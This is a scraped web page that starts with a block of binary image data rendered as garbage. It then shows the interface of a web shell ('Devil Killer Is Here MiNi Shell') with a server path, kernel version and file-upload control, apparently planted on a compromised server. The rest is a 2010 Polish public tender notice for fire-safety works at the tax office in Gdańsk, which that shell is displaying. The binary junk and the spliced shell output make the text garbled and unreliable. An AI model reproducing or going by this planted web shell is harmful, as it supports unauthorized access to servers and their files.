JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100902/238353-N-2010.html

<p class="kh_header"><b>Gdańsk: Postępowania o udzielenie zamówienia publicznego na robotę budowlaną w trybie przetargu nieograniczonego na: wykonanie robót budowlanych polegających na dostosowaniu istniejącej klatki schodowej oraz korytarzy komunikacji ogólnej w budynku Pomorskiego Urzędu Skarbowego 
w Gdańsku przy ul. Żytniej 4-6 do wymogów bezpieczeństwa pożarowego</b><br>
<b>Numer ogłoszenia: 238353 - 2010; data zamieszczenia: 02.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorski Urząd Skarbowy w Gdańsku , ul. Żytnia 4/6, 80-749 Gdańsk, woj. pomorskie, tel. 0-58 69 05 937, faks 0-58 69 05 991.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowania o udzielenie zamówienia publicznego na robotę budowlaną w trybie przetargu nieograniczonego na: wykonanie robót budowlanych polegających na dostosowaniu istniejącej klatki schodowej oraz korytarzy komunikacji ogólnej w budynku Pomorskiego Urzędu Skarbowego 
w Gdańsku przy ul. Żytniej 4-6 do wymogów bezpieczeństwa pożarowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.

Dane ogólne

Przedmiotem opracowania jest dostosowanie istniejącej klatki schodowej oraz korytarzy komunikacji ogólnej w budynku Pomorskiego Urzędu Skarbowego do wymogów ochrony ppoż.	
	
Lokalizacja 
Gdańsk ul. Żytnia 4/6, obręb 99 dz. nr 94

Funkcja obiektu
Budynek użyteczności publicznej

Dane podstawowe budynku:
-	  wysokość  - 19,10m
-	  ilość kondygnacji - cztery (4), z poddaszem użytkowym,
-	  podpiwniczenie 
-	  powierzchnia zabudowy -  955,00 m2,
-	  powierzchnia wewnętrzna strefy pożarowej - 3 020,00m2,
-	  kubatura -  13 472,00m3

Dane konstrukcyjne :
-   ściany murowane ceglane
-   stropy żelbetowe
-   dach - stromy dwuspadkowy kryty dachówką  ceramiczną ; konstrukcja nośna drewniana
-   schody - konstrukcja żelbetowa
-   stolarka okienna i drzwiowa drewniana i PCV.

Opis stanu istniejącego
      W budynku do celów ewakuacji ze wszystkich kondygnacji służy jedna klatka schodowa.
      Wymiary schodów :
       - szerokość klatki schodowej - od 3,78m - 3,90m.
       - szerokość biegów  - od 1,30m do 1,73m
       - wysokość stopni - 16,2cm do 16,6 cm
       - szerokość spoczników : 
                         -  spocznik międzypiętrowy   poz. +2,93  - 1,88m  i 1,60m
                         -  podest I-piętra                    poz. +3,89  - 1,37m  i  3,04m
                         -  spocznik międzypiętrowy   poz. +5,71  - 1,27m  i  1,87m
                         -  podest II-piętra                   poz. +7,52  - 1,37m  i  3,04m
                         -  spocznik międzypiętrowy   poz. +9,31  - 1,27m  i  1,75m
                         -  podest poddasza               poz.+11,11  - 1,27m  i  1,70m
Dojścia ewakuacyjne do w/w klatki schodowej z poszczególnych kondygnacji stanowią korytarze komunikacji ogólnej. Obudowę klatki schodowej stanowią ściany murowane grubości co najmniej 25 cm obustronnie tynkowane. Wyjścia z klatki schodowej na korytarze komunikacji ogólnej na poszczególnych kondygnacjach, za wyjątkiem poddasza, obudowane są przeszkleniami do poziomu istniejącego stropu i zamknięte przeszklonymi drzwiami o wym.100x210. Obudowę klatki schodowej na poddaszu stanowi ściana murowana gr 12cm obustronnie tynkowana zamknięta drzwiami o wym.90x200. Z klatki schodowej na poddaszu prowadzi wyjście do nieużytkowej części poddasza poprzez składane schody strychowe zamknięte klapą odporności ogniowej EI 30. Z klatki schodowej w poziomie parteru prowadzi zejście do piwnicy poprzez przedsionek (pomieszczenie nr1.3) oddzielony od klatki schodowej ścianą murowaną obustronnie tynkowaną gr12cm; w ścianie istniejące drzwi o wymiarach 90x200.
     
Budynek posiada dwa wyjścia prowadzące na zewnątrz :
      - Wyjście od frontu :
Wyjście z klatki schodowej na zewnątrz budynku prowadzi przez wiatrołap mający połączenie z przyległymi do niego pomieszczeniem 1.16 (poprzez okno podawcze) i pomieszczeniem 1.15 (poprzez drzwi wejściowe). Drzwi wyjściowe prowadzące na zewnątrz budynku o wymiarach 110x240 otwierane do wewnątrz.

- Wyjście na tyły budynku :
Wyjście z klatki schodowej na zewnątrz budynku prowadzi przez przedsionek (pomieszczenie 1.3) mając połączenie z piwnicą poprzez istniejące schody żelbetowe. Drzwi prowadzące na zewnątrz o wym. 100x200 otwierane do wewnątrz.
  
Klatka schodowa posiada oświetlenie naturalne w postaci okien zlokalizowanych na podestach międzypiętrowych oraz oświetlenie elektryczne. Na podestach międzypiętrowych klatki schodowej zlokalizowano istniejące lampy oświetlenia awaryjnego. Na klatce schodowej w miejscach oznaczonych na rys.A-3, A-4, A-5, A-6 zlokalizowano istniejące wewnętrzne hydranty ppoż.
       
Zakres prac adaptacyjnych związanych z dostosowaniem dróg ewakuacyjnych do wymagań ochrony ppoż.
Zakres prac adaptacyjnych określono na podstawie ekspertyzy technicznej w sprawie warunków bezpieczeństwa pożarowego w zakresie dostosowania przedmiotowej klatki schodowej będącej załącznikiem do niniejszego opracowania.

Z uwagi na przekroczenie wymaganej długości dojścia ewakuacyjnego, należy zmniejszyć długość korytarzy poprzez przebudowę ich na pomieszczenia w taki sposób, że długość dojścia na poziomej drodze ewakuacyjnej nie przekroczy 20 m. Przejście ewakuacyjne nie powinno przekraczać długości 40 m i nie powinno prowadzić łącznie przez więcej niż trzy pomieszczenia.
W miejscach oznaczonych na rys.A-4, A-5 i A-6 projektuje się wydzielenie pomieszczeń  poczekalni ( 2.8a , 3.2a 3.2b , 4.2a , 4.2b ). W miejscach oznaczonych na w/w rysunkach wykonać ścianki gr 10cm w systemie lekkiej zabudowy w klasie odporności ogniowej EI 30 zgodnie z  AT ITB dla wybranego systemu. W projektowanych ściankach osadzić drzwi z naświetlami nieotwieralnymi zgodnie z opisem na w/w rysunkach i zestawieniem stolarki rys. A-8.

Obudowa klatki schodowej - w miejscach oznaczonych na rys.A-3, A-4 i A-5 dokonać rozbiórki istniejących przeszkleń wraz z istniejącymi drzwiami do poziomu stropu żelbetowego. W miejscach oznaczonych na w/w rysunkach wykonać ścianki gr 10cm w systemie lekkiej zabudowy (ścianki systemowe aluminiowe przeszklone) w klasie odporności ogniowej EI 60 zgodnie z AT ITB dla wybranego systemu Ujęte w zestawieniu stolarki. 
      
uwaga :
zwrócić szczególną uwagę na lokalizację ścianek obudowy klatki schodowej na poziomach I i II piętra !
W ściankach osadzić drzwi w klasie odporności ogniowej EI 30 zgodnie z opisem na w/w rysunkach oraz zestawieniem stolarki rys. A-8.
      
Wykonać demontaż istniejących drzwi zamykających klatkę schodową na kondygnacji poddasza , dokonać poszerzenia istniejącego otworu; osadzić drzwi w klasie odporności ogniowej EI 30 zgodnie z opisem na rys.A-6  
oraz zestawieniem stolarki rys. A-8.
     
Dokonać wymiany stolarki drzwiowej w miejscach oznaczonych na rys.A-3 (drzwi stanowiące wyjście z pomieszczenia 1.16 na korytarz komunikacji ogólnodostępnej , wejście  do pomieszczenia 1.15 ). Drzwi w klasie odporności ogniowej EI 30 osadzić zgodnie z opisem na w/w rysunku i zestawieniem stolarki rys. A-8.
     
Wykonać demontaż istniejących drzwi zamykających klatkę schodową na kondygnacji parteru stanowiących zamknięcie przedsionka 1.3 , dokonać poszerzenia istniejącego otworu ; osadzić drzwi w klasie odporności ogniowej 
EI 30 zgodnie z opisem na rys.A-3  oraz zestawieniem stolarki rys.A-8.

Wykonać demontaż istniejących drzwi wyjściowych z klatki schodowej prowadzących na tyły budynku , dokonać poszerzenia istniejącego otworu ; osadzić drzwi zgodnie z opisem na rys.A-3  oraz zestawieniem stolarki rys.nr A-8.
      
Dokonać wymiany drzwi zamykających piwnicę, osadzić drzwi w klasie odporności ogniowej EI 60 zgodnie z lokalizacją i opisem na rys.A-2 oraz zestawieniem stolarki rys.A-8.
       
Dokonać zmiany lokalizacji istniejących na klatce schodowej wewnętrznych hydrantów ppoż. 0W miejscach oznaczonych na rys.A-4, A-5 i A-6 projektuje się wewnętrzne hydranty ppoż. 25 o długości węża 30m. (wykonanie zgodnie z odrębnym projektem branżowym )

Uzupełnienie istniejącego oświetlenia awaryjnego na klatce schodowej.

W miejscu oznaczonym na rys.A-2 i A-7 zamontować uchylną barierkę zabezpieczającą zejście do piwnicy.

W miejscu oznaczonym na rys.A-6 i A-7 zamontować klapę oddymiającą 

Wykonać w niezbędnym zakresie rozbiórkę części skośnej obudowy klatki schodowej oraz pokrycia dachowego. Konstrukcję drewnianą dachu w miejscu montażu w/w klapy dymowej dostosować do wymaganych wymiarów 
Montaż klapy wykonać zgodnie z instrukcją producenta.
     
Dobór wielkości klapy dymowej :
powierzchnia rzutu klatki schodowej 
                         P1 = 6,9 m2   
wymagana powierzchnia klapy dymowej  
                        P2 = 0,05 x P1 = 0,05 x 6,9m2 = 3,45m2 
Wybrano klapę dymową dwuskrzydłową z podstawą prostą o wymiarze nominalnym 2,4m x 2,5m i powierzchni czynnej 3,6 m2. 

Uzupełnić w niezbędnym zakresie ubytki w pokryciu dachowym powstałe w wyniku montażu klapy.

Wykonać obudowę klatki schodowej w systemie lekkiej zabudowy - wymagana klasa odporności ogniowej obudowy EI60 ( zgodnie z AT ITB  dla wybranego systemu).

Roboty malarskie
Klatka schodowa oraz korytarze na wszystkich kondygnacjach należy usunąć warstwy starej farby, uzupełnić ubytki tynku, oszpachlować, oraz pomalować całe pomieszczenia farbą akrylową. 

Budynek wyposażyć w połączone ze sobą systemy sygnalizacji pożaru i oddymiania.
OPIS TECHNICZNY
Roboty obejmują wykonanie :
-instalacji optycznych czujek dymu,
- instalacji przewodów połączeniowych do czujek
- rozbudowy istniejącej centrali p/poż.

INSTALACJA CZUJEK
Jako czujnik proponuje się adresowalną, wielostanową optyczną czujkę dymu 
OP 320Awspółpracującą z istniejącą centralą FC330A. Optyczne czujniki dymu należy montować bezpośrednio na syficie w miejscach oznaczonych na rysunkach technicznych. Połączenia czujek wykonać w systemie pętli zapewniającej pewne działanie wszystkich elementów systemu w razie zwarcia na linii dozorowej. Połączenia elementów systemu SAP wykonać przewodem YnTKSY 1x2x0,8mm2. Parametry proponowanej czujki załączono do dokumentacji w formie noty katalogowej.
Instalację czujek wykonać zgodnie z zaleceniami zawartymi w instrukcji montażu dostarczanej przez producenta urządzenia.
URZĄDZENIA ODDYMIAJĄCE
W budynku zainstalować urządzenia oddymiające klatki schodowe. Urządzenie umiejscowione ma być na poddaszu klatki schodowej. Do urządzenia doprowadzić przewód zasilania od istniejącej centrali p/poż., zlokalizowanej na parterze w pomieszczeniu ochrony, która w razie wykrycia pożary powinna uruchomić proces oddymiania. Zasilanie wykonać przewodem ognioodpornym HDGs 3x1,5mm2. 
UWAGI KOŃCOWE
Wszystkie urządzenia SAP powinny posiadać aktualne świadectwa dopuszczenia wyrobów do użytkowania w ochronie przeciwpożarowej (certyfikaty) wydane przez Centrum Naukowo - Badawcze Ochrony Przeciwpożarowej w Józefowie k/Otwocka.

      

Postanowienia końcowe
Wszystkie roboty budowlano montażowe powinny być prowadzone zgodnie z odpowiednimi przepisami BHP i ppoż. pod nadzorem upr. kierownika robót. Wszystkie wbudowywane materiały powinny posiadać odpowiednie atesty. Wszelkie zmiany materiałowo-konstrukcyjne wymagają pisemnej zgody projektanta potwierdzonej wpisem w dzienniku budowy.	

NAZWA I KOD GRUP ROBÓT:
 
45000000-7 Roboty budowlane
45312100-8 Instalowanie przeciwpożarowych systemów alarmowych
45343000-3 Roboty instalacyjne przeciwpożarowe
45453000-7 Roboty remontowe i renowacyjne,
45450000-6 Roboty budowlane wykończeniowe, pozostałe.

Przedmiot zamówienia - roboty budowlane będą mogły być realizowane w godzinach od 07.00 do 16.00 od poniedziałku do piątku, a w soboty i niedziele za zgodą kierownika Zamawiającego. 
Wykonawca będzie realizował przedmiot zamówienia zgodnie ze sztuką budowlaną, dokumentacją techniczną, specyfikacją techniczną wykonania i odbioru robót z uwzględnieniem wizji lokalnej w budynku (Zamawiający umożliwi przeprowadzenie wizji lokalnej po uprzednim uzgodnieniu terminu z jego przedstawicielem) oraz niniejszą SIWZ.

Przedmiot zamówienia publicznego należy wykonać zgodnie z:
Prawomocną decyzją nr WUAiOZ-I-7353-1529-3-10-4-MM-157101 z dnia 09 sierpnia 2010 roku Prezydenta Miasta Gdańska - pozwolenia na wykonanie robót budowlanych polegających na dostosowaniu istniejącej klatki schodowej do warunków ochrony przeciwpożarowej w budynku Pomorskiego Urzędu Skarbowego w Gdańsku położonego przy ul. Żytniej 4/6 w Gdańsku na terenie działki nr 94 obr. 99. 

Dokumentacja techniczna przedmiotu zamówienia stanowi ZAŁĄCZNIK NR 10 do niniejszej SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.12.10-8, 45.34.00.00-3, 45.45.30.00-7, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1) posiadania wiedzy i doświadczenia - warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, (rozpoczęcie i zakończenie realizacji zadania jest w wymienionym okresie), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej:
a) dwie roboty ogólnobudowlane o wartości nie mniejszej niż 150.000 zł brutto każda, w przypadku Wykonawcy lub Wykonawców występujących wspólnie polegających na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących ich stosunków, Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą się łącznie dwiema ww. robotami budowlanymi oraz załączą dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:dysponowania osobami zdolnymi do wykonania zamówienia - warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje następującymi osobami zdolnymi do wykonania przedmiotu zamówienia:
a) kierownikiem budowy - o specjalności konstrukcyjno-budowlanej,
b) kierownik robót - o specjalności sanitarnej,
c) kierownik robót - o specjalności elektrycznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - warunek zostanie spełniony, jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 100 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Do umowy w sprawie zamówienia publicznego stosuje się przepisy Kodeksu cywilnego, jeżeli przepisy ustawy nie stanowią inaczej.
2.	Projekt umowy, jaka ma zostać zawarta w efekcie przeprowadzonego postępowania o udzielenie zamówienia publicznego, stanowi ZAŁĄCZNIK NR 9 do niniejszej SIWZ.
3.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia.
